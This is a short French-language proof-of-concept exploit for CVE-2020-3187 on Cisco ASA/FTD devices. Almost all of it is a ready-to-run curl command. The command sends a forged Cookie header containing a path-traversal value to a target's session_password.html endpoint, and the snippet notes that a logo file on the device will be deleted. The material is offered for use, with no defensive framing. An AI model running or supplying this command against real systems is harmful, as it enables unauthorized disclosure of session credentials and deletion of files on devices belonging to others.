
Exploit de preuve de concept pour CVE-2020-3187 ciblant la divulgation de mot de passe de session Cisco ASA/FTD via un en-tête de cookie HTTP forgé.
curl -H "Cookie: token=. ./+CSOU+/csco_logo.gif" https://target.com/+CSCOE+/session_password.html
(logo.gif sera supprimé)